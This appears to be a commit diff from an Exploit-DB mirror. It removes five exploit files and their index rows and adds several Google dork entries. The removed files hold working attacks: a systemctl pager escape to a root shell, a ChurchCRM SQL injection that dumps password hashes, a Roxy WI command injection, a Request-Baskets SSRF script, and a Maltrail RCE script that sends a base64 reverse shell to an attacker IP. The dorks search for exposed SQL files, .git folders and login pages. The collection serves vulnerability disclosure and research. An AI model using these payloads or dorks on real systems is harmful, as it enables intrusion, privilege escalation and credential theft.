DB: 2023-10-31

12 changes to exploits/shellcodes/ghdb systemd 246 - Local Privilege Escalation ChurchCRM v4.5.3 - Authenticated SQL Injection Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE) Request-Baskets v1.2.1 - Server-side request forgery (SSRF)
2023-10-31 00:17:05 +00:00 · 2023-10-31 00:17:05 +00:00 · 75cbb282d9
commit 75cbb282d9
parent 45020d9cc3
7 changed files with 150 additions and 162 deletions
--- a/exploits/linux/local/51674.txt
+++ b/exploits/linux/local/51674.txt
@ -1,17 +0,0 @@
 # Exploit Title: systemd 246 - Local Privilege Escalation
 # Exploit Author: Iyaad Luqman K (init_6)
 # Application: systemd 246
 # Tested on: Ubuntu 22.04
 # CVE: CVE-2023-26604
 systemd 246 was discovered to contain Privilege Escalation vulnerability, when the `systemctl status` command can be run as root user.
 This vulnerability allows a local attacker to gain root privileges.
 ## Proof Of Concept:
 1. Run the systemctl command which can be run as root user.
 sudo /usr/bin/systemctl status any_service
 2. The ouput is opened in a pager (less) which allows us to execute arbitrary commands.
 3. Type in `!/bin/sh` in the pager to spawn a shell as root user.
--- a/exploits/php/webapps/51397.txt
+++ b/exploits/php/webapps/51397.txt
@ -1,30 +0,0 @@
 # Exploit Title: ChurchCRM 4.5.3 - Authenticated SQL Injection
 # Date: 27-04-2023
 # Exploit Author: Iyaad Luqman K
 # Software Link: https://github.com/ChurchCRM/CRM/releases
 # Vendor Homepage: http://churchcrm.io/
 # Tested Version: 4.5.1
 # Tested on: Windows, Linux
 # CVE: CVE-2023-24685
 ChurchCRM v4.5.3 and below was discovered to contain a SQL injection vulnerability via the Event parameter
 under the Event Attendance reports module.
 - After Logging in, go to
 ```
 GET /EventAttendance.php?Action=List&Event=2+UNION+ALL+SELECT+1,NULL,CONCAT(%27Perseverance%27,usr_Username,%27:%27,usr_Password),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+from+user_usr--+-&Type=Sunday%20School HTTP/1.1
 Host: localhost
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.9
 Cookie: CRM-7bf048c51cd7d0923f0ab3e959c3d3f6=d99fjb19f2kp081ol95remfm6d
 Connection: close
 ```
 - The response will dump the `usr_Username` and `usr_Password` from the database.
 ```
 PerseveranceAdmin:261f4aef6877ce6c11a780ae6c13e4e2f27a8a55f69d6d6785fc787063272db4
 ```
--- a/exploits/php/webapps/51481.txt
+++ b/exploits/php/webapps/51481.txt
@ -1,24 +0,0 @@
 # Exploit Title: Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute
 # Exploit Author: Iyaad Luqman K
 # Application: Roxy WI <= v6.1.0.0
 # Vendor Homepage: https://roxy-wi.org
 # Software Link: https://github.com/hap-wi/roxy-wi.git
 # Tested on: Ubuntu 22.04
 # CVE : CVE-2022-31137
 # PoC
 POST /app/options.py HTTP/1.1
 Host: 192.168.1.44
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
 Accept: */*
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
 Content-Length: 136
 Origin: https://192.168.1.44
 Referer: https://192.168.1.44/app/login.py
 Connection: close
 show_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcertalert_consumer=1&serv=127.0.0.1&ipbackend=";id+##&backend_server=127.0.0.1
--- a/exploits/python/webapps/51675.sh
+++ b/exploits/python/webapps/51675.sh
@ -1,53 +0,0 @@
 # Exploit Title: Request-Baskets v1.2.1 - Server-side request forgery (SSRF)
 # Exploit Author: Iyaad Luqman K (init_6)
 # Application: Request-Baskets v1.2.1
 # Tested on: Ubuntu 22.04
 # CVE: CVE-2023-27163
 # PoC
 #!/bin/bash
 if [ "$#" -lt 2 ] || [ "$1" = "-h" ] || [ "$1" = "--help" ]; then
    help="Usage: exploit.sh <URL> <TARGET>\n\n";
    help+="Arguments:\n" \
    help+=" URL            main path (/) of the server (eg. http://127.0.0.1:5000/)\n";
    help+=" TARGET";
    echo -e "$help";
    exit 1;
 fi
 URL=$1
 ATTACKER_SERVER=$2
 if [ "${URL: -1}" != "/" ]; then
    URL="$URL/";
 fi;
 BASKET_NAME=$(LC_ALL=C tr -dc 'a-z' </dev/urandom | head -c "6");
 API_URL="$URL""api/baskets/$BASKET_NAME";
 PAYLOAD="{\"forward_url\": \"$ATTACKER_SERVER\",\"proxy_response\": true,\"insecure_tls\": false,\"expand_path\": true,\"capacity\": 250}";
 echo "> Creating the \"$BASKET_NAME\" proxy basket...";
 if ! response=$(curl -s -X POST -H 'Content-Type: application/json' -d "$PAYLOAD" "$API_URL"); then
    echo "> FATAL: Could not properly request $API_URL. Is the server online?";
    exit 1;
 fi;
 BASKET_URL="$URL$BASKET_NAME";
 echo "> Basket created!";
 echo "> Accessing $BASKET_URL now makes the server request to $ATTACKER_SERVER.";
 if ! jq --help 1>/dev/null; then
    echo "> Response body (Authorization): $response";
 else
    echo "> Authorization: $(echo "$response" | jq -r ".token")";
 fi;
 exit 0;
--- a/exploits/python/webapps/51676.py
+++ b/exploits/python/webapps/51676.py
@ -1,33 +0,0 @@
 # Exploit Title: Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)
 # Exploit Author: Iyaad Luqman K (init_6)
 # Application: Maltrail v0.53
 # Tested on: Ubuntu 22.04
 # PoC
 import sys;
 import os;
 import base64;
 def main():
 	listening_IP = None
 	listening_PORT = None
 	target_URL = None
 	if len(sys.argv) != 4:
 		print("Error. Needs listening IP, PORT and target URL.")
 		return(-1)
 	listening_IP = sys.argv[1]
 	listening_PORT = sys.argv[2]
 	target_URL = sys.argv[3] + "/login"
 	print("Running exploit on " + str(target_URL))
 	curl_cmd(listening_IP, listening_PORT, target_URL)
 def curl_cmd(my_ip, my_port, target_url):
 	payload = f'python3 -c \'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{my_ip}",{my_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\''
 	encoded_payload = base64.b64encode(payload.encode()).decode()  # encode the payload in Base64
 	command = f"curl '{target_url}' --data 'username=;`echo+\"{encoded_payload}\"+|+base64+-d+|+sh`'"
 	os.system(command)
 if __name__ == "__main__":
  main()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -7746,7 +7746,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43935,exploits/linux/local/43935.txt,"systemd (systemd-tmpfiles) < 236 - 'fs.protected_hardlinks=0' Local Privilege Escalation",2018-01-29,"Michael Orlitzky",local,linux,,2018-01-31,2018-01-31,0,CVE-2017-18078,,,,,http://seclists.org/oss-sec/2018/q1/115
 45715,exploits/linux/local/45715.txt,"systemd - 'chown_one()' Dereference Symlinks",2018-10-29,"Google Security Research",local,linux,,2018-10-29,2018-11-17,1,CVE-2018-15687,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1689
 41171,exploits/linux/local/41171.txt,"Systemd 228 (SUSE 12 SP2 / Ubuntu Touch 15.04) - Local Privilege Escalation",2017-01-24,"Sebastian Krahmer",local,linux,,2017-01-26,2019-03-07,0,CVE-2016-10156,,,,,http://www.openwall.com/lists/oss-security/2017/01/24/4
 51674,exploits/linux/local/51674.txt,"systemd 246 - Local Privilege Escalation",2023-08-10,"Iyaad Luqman K",local,linux,,2023-08-10,2023-08-10,1,CVE-2023-26604,,,,,
 15620,exploits/linux/local/15620.sh,"SystemTap - Local Privilege Escalation",2010-11-26,"Tavis Ormandy",local,linux,,2010-11-26,2010-11-26,1,CVE-2010-4170;OSVDB-69489,,,http://www.exploit-db.com/screenshots/idlt16000/screen-shot-2010-11-26-at-62953-am.png,,
 33604,exploits/linux/local/33604.sh,"SystemTap 1.0/1.1 - '__get_argv()' / '__get_compat_argv()' Local Memory Corruption",2010-02-05,"Josh Stone",local,linux,,2010-02-05,2014-06-01,1,CVE-2010-0411;OSVDB-62131,,,,,https://www.securityfocus.com/bid/38120/info
 46730,exploits/linux/local/46730.rb,"SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)",2019-04-19,Metasploit,local,linux,,2019-04-19,2019-04-19,1,CVE-2010-4170,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/local/systemtap_modprobe_options_priv_esc.rb
@ -15597,7 +15596,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50116,exploits/php/webapps/50116.py,"Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE",2021-07-09,"Eleonora Guardini",webapps,php,,2021-07-09,2021-07-09,0,,,,,,
 50965,exploits/php/webapps/50965.txt,"ChurchCRM 4.4.5 - SQLi",2022-06-14,nu11secur1ty,webapps,php,,2022-06-14,2022-06-14,0,CVE-2022-31325,,,,,
 51319,exploits/php/webapps/51319.py,"ChurchCRM 4.5.1 - Authenticated SQL Injection",2023-04-07,Arvandy,webapps,php,,2023-04-07,2023-04-07,0,CVE-2023-24787,,,,,
 51397,exploits/php/webapps/51397.txt,"ChurchCRM v4.5.3 - Authenticated SQL Injection",2023-04-27,"Iyaad Luqman K",webapps,php,,2023-04-27,2023-05-07,1,CVE-2023-24685,,,,,
 51296,exploits/php/webapps/51296.txt,"ChurchCRM v4.5.3-121fcc1 - SQL Injection",2023-04-06,nu11secur1ty,webapps,php,,2023-04-06,2023-04-06,0,,,,,,
 51477,exploits/php/webapps/51477.txt,"ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)",2023-05-23,"Rahad Chowdhury",webapps,php,,2023-05-23,2023-05-23,0,CVE-2023-31699,,,,,
 15887,exploits/php/webapps/15887.txt,"ChurchInfo 1.2.12 - SQL Injection",2011-01-01,dun,webapps,php,,2011-01-01,2011-01-01,1,OSVDB-70253,,,,http://www.exploit-db.comchurchinfo-1.2.12.zip,
@ -28874,7 +28872,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 39963,exploits/php/webapps/39963.txt,"Roxy Fileman 1.4.4 - Arbitrary File Upload",2016-06-16,"Tyrell Sassen",webapps,php,80,2016-06-16,2016-06-16,0,,,,,http://www.exploit-db.comRoxyFileman-1.4.4-php.zip,
 46172,exploits/php/webapps/46172.txt,"Roxy Fileman 1.4.5 - Arbitrary File Download",2019-01-16,"Ihsan Sencan",webapps,php,80,2019-01-16,2019-01-16,0,,,,,http://www.exploit-db.comRoxyFileman-1.4.5-php.zip,
 46085,exploits/php/webapps/46085.txt,"Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal",2019-01-07,"Pongtorn Angsuchotmetee_ Vittawat Masaree",webapps,php,80,2019-01-07,2019-01-07,0,CVE-2018-20526;CVE-2018-20525,Traversal,,,http://www.exploit-db.comRoxyFileman-1.4.5-php.zip,
 51481,exploits/php/webapps/51481.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute",2023-05-24,"Iyaad Luqman K",webapps,php,,2023-05-24,2023-05-24,1,CVE-2022-31137,,,,,
 50934,exploits/php/webapps/50934.txt,"Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated)",2022-05-12,"Eren Gozaydin",webapps,php,,2022-05-12,2022-05-12,0,CVE-2022-28080,,,,,
 6589,exploits/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - 'showtopic' SQL Injection",2008-09-26,0x90,webapps,php,,2008-09-25,2016-12-23,1,OSVDB-49317;CVE-2008-4736,,,,,
 6591,exploits/php/webapps/6591.txt,"RPG.Board 0.0.8Beta2 - Insecure Cookie Handling",2008-09-27,Stack,webapps,php,,2008-09-26,,1,OSVDB-57330;CVE-2008-7028,,,,,
@ -34709,7 +34706,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal",2021-01-29,Lyghtnox,webapps,python,,2021-01-29,2021-11-01,0,,,,,,
 46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python,,2019-02-15,2019-02-15,0,CVE-2019-8341,,,,http://www.exploit-db.comJinja2-2.10.tar.gz,
 51109,exploits/python/webapps/51109.txt,"Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)",2023-03-28,"Ryan Smith",webapps,python,,2023-03-28,2023-03-28,0,CVE-2022-36551,,,,,
 51676,exploits/python/webapps/51676.py,"Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)",2023-08-10,"Iyaad Luqman K",webapps,python,,2023-08-10,2023-09-08,1,,,,,,
 40799,exploits/python/webapps/40799.txt,"Mezzanine 4.2.0 - Cross-Site Scripting",2016-11-21,"Curesec Research Team",webapps,python,80,2016-11-21,2016-11-21,0,,,,,http://www.exploit-db.commezzanine-4.2.0.tar.gz,
 51276,exploits/python/webapps/51276.go,"modoboa  2.0.4 - Admin TakeOver",2023-04-06,7h3h4ckv157,webapps,python,,2023-04-06,2023-04-06,0,CVE-2023-0777,,,,,
 49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",2021-04-26,"Fellipe Oliveira",webapps,python,,2021-04-26,2021-11-17,0,,,,,,
@ -34720,7 +34716,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51532,exploits/python/webapps/51532.py,"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)",2023-06-14,"Gabriel Lima",webapps,python,,2023-06-20,2023-06-20,1,CVE-2023-0297,,,,,
 39199,exploits/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",webapps,python,,2014-05-23,2016-01-08,1,CVE-2014-3854;OSVDB-107099,,,,,https://www.securityfocus.com/bid/67610/info
 51669,exploits/python/webapps/51669.txt,"Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated)",2023-08-08,"Daniel Barros",webapps,python,,2023-08-08,2023-08-08,0,CVE-2023-29689,,,,,
 51675,exploits/python/webapps/51675.sh,"Request-Baskets v1.2.1 - Server-side request forgery (SSRF)",2023-08-10,"Iyaad Luqman K",webapps,python,,2023-08-10,2023-08-10,1,CVE-2023-27163,,,,,
 51226,exploits/python/webapps/51226.txt,"Roxy WI v6.1.0.0 - Improper Authentication Control",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-05-24,1,CVE-2022-31125,,,,,
 51227,exploits/python/webapps/51227.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-06-04,1,CVE-2022-31126,,,,,
 51228,exploits/python/webapps/51228.txt,"Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-04-03,0,CVE-2022-31161,,,,,
--- a/ghdb.xml
+++ b/ghdb.xml
@ -32856,6 +32856,21 @@ Discovered by Rootkit Pentester.</textualDescription>
  <date>2015-12-21</date>
  <author>anonymous</author>
 </entry>
 <entry>
  <id>8287</id>
  <link>https://www.exploit-db.com/ghdb/8287</link>
  <category>Files Containing Juicy Info</category>
  <shortDescription>&quot;structure&quot; + ext:sql</shortDescription>
  <textualDescription># Google Dork: &quot;structure&quot; + ext:sql
 # Files Containing Juicy Info
 # Date: 30/10/2023
 # Exploit chum1ng0</textualDescription>
  <query>&quot;structure&quot; + ext:sql</query>
  <querystring>https://www.google.com/search?q=&quot;structure&quot; + ext:sql</querystring>
  <edb></edb>
  <date>2023-10-30</date>
  <author>chum1ng0</author>
 </entry>
 <entry>
  <id>140</id>
  <link>https://www.exploit-db.com/ghdb/140</link>
@ -42212,6 +42227,21 @@ An attacker can further misuse this to conduct attacks.
  <date>2020-05-04</date>
  <author>Tushar Kurunkar</author>
 </entry>
 <entry>
  <id>8289</id>
  <link>https://www.exploit-db.com/ghdb/8289</link>
  <category>Files Containing Juicy Info</category>
  <shortDescription>intitle:&quot;index of&quot; &quot;/config/prod/&quot;</shortDescription>
  <textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/config/prod/&quot;
 # Files Containing Juicy Info
 # Date: 30/10/2023
 # Exploit Suprit Pandurangi</textualDescription>
  <query>intitle:&quot;index of&quot; &quot;/config/prod/&quot;</query>
  <querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/config/prod/&quot;</querystring>
  <edb></edb>
  <date>2023-10-30</date>
  <author>Suprit Pandurangi</author>
 </entry>
 <entry>
  <id>5957</id>
  <link>https://www.exploit-db.com/ghdb/5957</link>
@ -49318,6 +49348,21 @@ code. *Dork discovered by:* Sachin Wagh (@tiger_tigerboy)
  <date>2018-02-05</date>
  <author>Sachin Wagh</author>
 </entry>
 <entry>
  <id>8280</id>
  <link>https://www.exploit-db.com/ghdb/8280</link>
  <category>Files Containing Juicy Info</category>
  <shortDescription>intitle:index.of login.js</shortDescription>
  <textualDescription># Google Dork: intitle:index.of login.js
 # Files Containing Juicy Info
 # Date: 30/10/2023
 # Exploit Varad Vaidya</textualDescription>
  <query>intitle:index.of login.js</query>
  <querystring>https://www.google.com/search?q=intitle:index.of login.js</querystring>
  <edb></edb>
  <date>2023-10-30</date>
  <author>Varad Vaidya</author>
 </entry>
 <entry>
  <id>7332</id>
  <link>https://www.exploit-db.com/ghdb/7332</link>
@ -49532,6 +49577,21 @@ Author: Lord.TMR</textualDescription>
  <date>2021-11-08</date>
  <author>Vivek Pancholi</author>
 </entry>
 <entry>
  <id>8284</id>
  <link>https://www.exploit-db.com/ghdb/8284</link>
  <category>Files Containing Juicy Info</category>
  <shortDescription>inurl: .git</shortDescription>
  <textualDescription># Google Dork: inurl: .git
 # Files Containing Juicy Info
 # Date: 30/10/2023
 # Exploit Jai kumar</textualDescription>
  <query>New submission</query>
  <querystring>https://www.google.com/search?q=New submission</querystring>
  <edb></edb>
  <date>2023-10-30</date>
  <author>Jai kumar</author>
 </entry>
 <entry>
  <id>7349</id>
  <link>https://www.exploit-db.com/ghdb/7349</link>
@ -55745,6 +55805,21 @@ Reza Abasi(Turku)
  <date>2022-06-22</date>
  <author>Simone Gasparato</author>
 </entry>
 <entry>
  <id>8281</id>
  <link>https://www.exploit-db.com/ghdb/8281</link>
  <category>Files Containing Juicy Info</category>
  <shortDescription>site:.com intitle:&quot;index of&quot; /mobikwike</shortDescription>
  <textualDescription># Google Dork: site:.com intitle:&quot;index of&quot; /mobikwike
 # Files Containing Juicy Info
 # Date: 30/10/2023
 # Exploit Husain Ahmad</textualDescription>
  <query>site:.com intitle:&quot;index of&quot; /mobikwike</query>
  <querystring>https://www.google.com/search?q=site:.com intitle:&quot;index of&quot; /mobikwike</querystring>
  <edb></edb>
  <date>2023-10-30</date>
  <author>Husain Ahmad</author>
 </entry>
 <entry>
  <id>7942</id>
  <link>https://www.exploit-db.com/ghdb/7942</link>
@ -55775,6 +55850,36 @@ Reza Abasi(Turku)
  <date>2022-06-20</date>
  <author>Chirag Lundwani</author>
 </entry>
 <entry>
  <id>8286</id>
  <link>https://www.exploit-db.com/ghdb/8286</link>
  <category>Files Containing Juicy Info</category>
  <shortDescription>site:.com intitle:&quot;index of&quot;/csb</shortDescription>
  <textualDescription># Google Dork: site:.com intitle:&quot;index of&quot;/csb
 # Files Containing Juicy Info
 # Date: 30/10/2023
 # Exploit Husain Ahmad</textualDescription>
  <query>site:.com intitle:&quot;index of&quot;/csb</query>
  <querystring>https://www.google.com/search?q=site:.com intitle:&quot;index of&quot;/csb</querystring>
  <edb></edb>
  <date>2023-10-30</date>
  <author>Husain Ahmad</author>
 </entry>
 <entry>
  <id>8285</id>
  <link>https://www.exploit-db.com/ghdb/8285</link>
  <category>Files Containing Juicy Info</category>
  <shortDescription>site:.com intitle:&quot;index of&quot;/sbi</shortDescription>
  <textualDescription># Google Dork: site:.com intitle:&quot;index of&quot;/sbi
 # Files Containing Juicy Info
 # Date: 30/10/2023
 # Exploit Husain Ahmad</textualDescription>
  <query>site:.com intitle:&quot;index of&quot;/sbi</query>
  <querystring>https://www.google.com/search?q=site:.com intitle:&quot;index of&quot;/sbi</querystring>
  <edb></edb>
  <date>2023-10-30</date>
  <author>Husain Ahmad</author>
 </entry>
 <entry>
  <id>8116</id>
  <link>https://www.exploit-db.com/ghdb/8116</link>
@ -55790,6 +55895,21 @@ Reza Abasi(Turku)
  <date>2023-03-16</date>
  <author>PRINCY M JOSE</author>
 </entry>
 <entry>
  <id>8282</id>
  <link>https://www.exploit-db.com/ghdb/8282</link>
  <category>Files Containing Juicy Info</category>
  <shortDescription>site:.com inurl:/pass-aspx.</shortDescription>
  <textualDescription># Google Dork: site:.com inurl:/pass-aspx.
 # Files Containing Juicy Info
 # Date: 30/10/2023
 # Exploit swara kalsekar</textualDescription>
  <query>Submiting a google dork.</query>
  <querystring>https://www.google.com/search?q=Submiting a google dork.</querystring>
  <edb></edb>
  <date>2023-10-30</date>
  <author>swara kalsekar</author>
 </entry>
 <entry>
  <id>8258</id>
  <link>https://www.exploit-db.com/ghdb/8258</link>
@ -80463,6 +80583,21 @@ inurl:&quot;/libs/granite/core/content/login.html&quot;
  <date>2023-06-02</date>
  <author>Sachin Gupta</author>
 </entry>
 <entry>
  <id>8283</id>
  <link>https://www.exploit-db.com/ghdb/8283</link>
  <category>Pages Containing Login Portals</category>
  <shortDescription>inurl:&quot;/login.aspx&quot; intitle:&quot;pass&quot;.</shortDescription>
  <textualDescription># Google Dork: inurl:&quot;/login.aspx&quot; intitle:&quot;pass&quot;.
 # Pages Containing Login Portals
 # Date: 30/10/2023
 # Exploit swara kalsekar</textualDescription>
  <query>Submitting a google dork.</query>
  <querystring>https://www.google.com/search?q=Submitting a google dork.</querystring>
  <edb></edb>
  <date>2023-10-30</date>
  <author>swara kalsekar</author>
 </entry>
 <entry>
  <id>8208</id>
  <link>https://www.exploit-db.com/ghdb/8208</link>
@ -91682,6 +91817,21 @@ site:&quot;.atlassian.net&quot; / &quot;service desk/customer/user/login&quot;</
  <date>2020-04-21</date>
  <author>Juveria Banu</author>
 </entry>
 <entry>
  <id>8288</id>
  <link>https://www.exploit-db.com/ghdb/8288</link>
  <category>Pages Containing Login Portals</category>
  <shortDescription>site:..us inurl:&quot;login.php&quot;</shortDescription>
  <textualDescription># Google Dork: site:..us inurl:&quot;login.php&quot;
 # Pages Containing Login Portals
 # Date: 30/10/2023
 # Exploit Husain Ahmad</textualDescription>
  <query>site:..us inurl:&quot;login.php&quot;</query>
  <querystring>https://www.google.com/search?q=site:..us inurl:&quot;login.php&quot;</querystring>
  <edb></edb>
  <date>2023-10-30</date>
  <author>Husain Ahmad</author>
 </entry>
 <entry>
  <id>7501</id>
  <link>https://www.exploit-db.com/ghdb/7501</link>